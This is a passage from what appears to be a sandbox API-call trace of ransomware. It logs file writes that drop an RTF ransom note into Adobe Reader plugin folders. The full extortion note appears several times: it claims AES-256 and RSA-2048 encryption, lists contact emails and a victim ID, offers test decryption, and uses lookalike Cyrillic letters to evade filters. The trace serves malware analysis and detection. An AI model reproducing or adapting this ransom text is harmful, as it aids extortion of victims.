pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2867358, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0065.718] WriteFile (in: hFile=0x1dc, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0065.720] CloseHandle (hObject=0x1dc) returned 1 [0065.720] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hrv\\bg85_info.rtf")) returned 0xffffffff [0065.720] GetLastError () returned 0x2 [0065.720] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hrv\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0065.721] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 